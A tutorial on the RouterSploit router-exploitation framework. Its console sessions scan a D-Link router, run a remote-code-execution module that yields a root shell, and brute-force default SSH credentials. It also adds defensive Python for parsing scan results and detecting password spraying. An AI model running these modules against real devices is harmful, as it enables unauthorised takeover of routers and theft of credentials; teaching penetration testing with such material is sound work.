RouterSploit: router vulnerability detection and exploitation framework
RouterSploit is an open-source vulnerability detection and exploitation framework whose targets are mainly embedded devices such as routers.
Framework features
The RouterSploit framework is made up of several modules that can be used in penetration testing:
1、Scanners: modules that check whether the target device has an exploitable security issue;
2、Creds: modules that test the login credentials of network services;
3、Exploits: modules that, once a security issue has been identified on the target device, exploit the vulnerability to achieve goals such as privilege escalation.
Tool installation
sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
The GitHub repository is the one given in the commands above (RouterSploit).
Usage
First, launch the RouterSploit framework, as shown below:
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
Router Exploitation Framework |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Wildest Dreams
Version : 1.0.0
rsf >
1、Scanners module
The scanners module provides vulnerability scanning of devices; with it, one can quickly determine whether the target device has an exploitable security issue. Below, a D-Link router is used as an example to walk through the procedure.
(1) Select the scanners module as follows:
rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options
(2) Show options
Target options:

Name      Current settings     Description
----      ----------------     -----------
target                         Target address e.g. http://192.168.1.1
port      80                   Target port
(3) Set the target device IP
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
(4) Run the module; it executes as follows:
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_390_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_390l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_500_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_500_rce is not vulnerable
[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure
As the result above shows, the target device has the dwr_932_info_disclosure vulnerability. The next step is to choose a suitable payload to send and verify it (this involves the Exploits module, described further below).
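To turn the scanner output above into something a defender can track, here is an added Python example (not part of RouterSploit) that parses the `run` output of a scanners/* module into vulnerable and not-vulnerable module lists; the sample output is constructed from the lines shown above, and the severity buckets in `severity_hint` are an assumption of this example, not a RouterSploit field.

```python
import re

# Constructed sample: the run output of scanners/dlink_scan shown above.
SAMPLE_OUTPUT = """\
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_390_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_390l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_500_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_500_rce is not vulnerable
[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure
"""

# One per-module verdict line: "[+|-] exploits/<vendor>/<module> is [not] vulnerable".
LINE_RE = re.compile(
    r"^\[(?P<mark>[+-])\]\s+(?P<module>exploits/\S+)\s+is\s+"
    r"(?P<verdict>not vulnerable|vulnerable)\s*$",
    re.IGNORECASE,
)

def parse_scan(text):
    """Split scanner output into vulnerable / not_vulnerable module lists.
    'consistent' becomes False if a line's [+]/[-] marker disagrees with its
    verdict text, which points at truncated or garbled output worth re-running."""
    result = {"vulnerable": [], "not_vulnerable": [], "consistent": True}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # summary line, banner or blank line
        vulnerable = m.group("verdict").lower() == "vulnerable"
        if vulnerable != (m.group("mark") == "+"):
            result["consistent"] = False
        result["vulnerable" if vulnerable else "not_vulnerable"].append(m.group("module"))
    return result

def severity_hint(module):
    # Triage bucket derived from the module name suffix (an assumption of this example).
    name = module.rsplit("/", 1)[-1]
    if name.endswith("_rce"):
        return "critical"
    if name.endswith(("_auth_bypass", "_password_disclosure")):
        return "high"
    return "medium"

if __name__ == "__main__":
    for mod in parse_scan(SAMPLE_OUTPUT)["vulnerable"]:
        print(f"{severity_hint(mod):8} {mod}")
```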
2、Exploits module
(1) Select the Exploits module as follows:
rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/
exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_500_rce
rsf (D-LINK DIR-300 & DIR-500 RCE) >
The "tab" key can also be used to auto-complete a typed command.
(2) Show options
rsf (D-LINK DIR-300 & DIR-500 RCE) > show options

Target options:

Name      Current settings     Description
----      ----------------     -----------
target                         Target address e.g. http://192.168.1.1
port      80                   Target port
Set the options as follows:
rsf (D-LINK DIR-300 & DIR-500 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}
(3) Run the module
Use the "run" or "exploit" command to carry out the exploitation:
rsf (D-LINK DIR-300 & DIR-500 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root
It is also possible to only check whether the target device has the selected security issue, as follows:
rsf (D-LINK DIR-300 & DIR-500 RCE) > check
[+] Target is vulnerable
(4) Show detailed vulnerability information
The "show info" command displays the vulnerability information, including the affected device brand and model, the vulnerability type and the reference sources, as follows:
rsf (D-LINK DIR-300 & DIR-500 RCE) > show info

Name:
D-LINK DIR-300 & DIR-500 RCE

Description:
Module exploits D-Link DIR-300, DIR-500 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 500

Authors:
- Michael Messner at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/es/home-solutions/connect/routers/dir-500-wireless-n-250-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003
3、Creds module
(1) Select the module
The files for this module are located in the routersploit/modules/creds/ directory. The services the module can test are:
- ftp
- ssh
- telnet
- http basic auth
- http form auth
- snmp
During testing, each of the services above can be tested from two angles:
Default credential check: using the dictionaries of default login credentials for various routers, other devices and services that the framework provides, rapid enumeration verifies within a short time (a few seconds) whether a device still uses its default credentials;
Brute force: a dictionary attack using a specific account or an account list provided by the framework. It takes two parameters (username and password); as the dictionaries in the framework's routersploit/wordlists directory show, a parameter value can be a single word (e.g. 'admin') or an entire word list.
(2) Console
rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
(3) Show options
(4) Set the target device IP
rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}
(5) Run the module
rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
----- --------
admin 1234
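From the defender's side, the default-credential run above looks like a burst of failed SSH logins from one source with many distinct dictionary usernames inside a few seconds, sometimes followed by a success. The following added Python example (not RouterSploit code) applies that detection logic to constructed OpenSSH-style syslog lines; the thresholds, the source addresses and the year used for timestamp parsing are assumptions of the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed OpenSSH-style syslog lines mirroring the creds/ssh_default run above:
# many distinct dictionary usernames from one source within seconds, then a success.
SAMPLE_LOG = """\
Jun 01 10:00:01 router sshd[812]: Failed password for invalid user 3comcso from 192.168.1.20 port 51002 ssh2
Jun 01 10:00:01 router sshd[813]: Failed password for invalid user 1234 from 192.168.1.20 port 51003 ssh2
Jun 01 10:00:02 router sshd[814]: Failed password for invalid user 1111 from 192.168.1.20 port 51004 ssh2
Jun 01 10:00:02 router sshd[815]: Failed password for invalid user ADVMAIL from 192.168.1.20 port 51005 ssh2
Jun 01 10:00:03 router sshd[816]: Failed password for invalid user 266344 from 192.168.1.20 port 51006 ssh2
Jun 01 10:00:03 router sshd[817]: Failed password for admin from 192.168.1.20 port 51007 ssh2
Jun 01 10:00:05 router sshd[818]: Accepted password for admin from 192.168.1.20 port 51008 ssh2
Jun 01 10:30:00 router sshd[901]: Failed password for admin from 192.168.1.7 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)

def detect_spray(log, window_s=60, min_failures=5, min_users=3):
    """Flag sources with >= min_failures failed logins over >= min_users distinct
    usernames inside window_s seconds, and record whether that source later logged
    in successfully (a noisy scan vs. a default-credential compromise). Thresholds
    are assumptions for this example."""
    events = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog lines carry no year; 2024 is assumed so timestamps can be compared
        ts = datetime.strptime("2024 " + m["ts"], "%Y %b %d %H:%M:%S")
        events[m["src"]].append((ts, m["result"], m["user"]))
    alerts = {}
    for src, evs in events.items():
        evs.sort()
        fails = [(t, u) for t, r, u in evs if r == "Failed"]
        for i, (t0, _) in enumerate(fails):
            burst = [u for t, u in fails[i:] if (t - t0).total_seconds() <= window_s]
            if len(burst) >= min_failures and len(set(burst)) >= min_users:
                alerts[src] = {
                    "failures": len(burst),
                    "usernames": sorted(set(burst)),
                    "success_after": any(r == "Accepted" and t >= t0 for t, r, _ in evs),
                }
                break
    return alerts
```

A single source that fails once (192.168.1.7 in the sample) does not trip the rule, while the spraying source is flagged together with the fact that a login later succeeded.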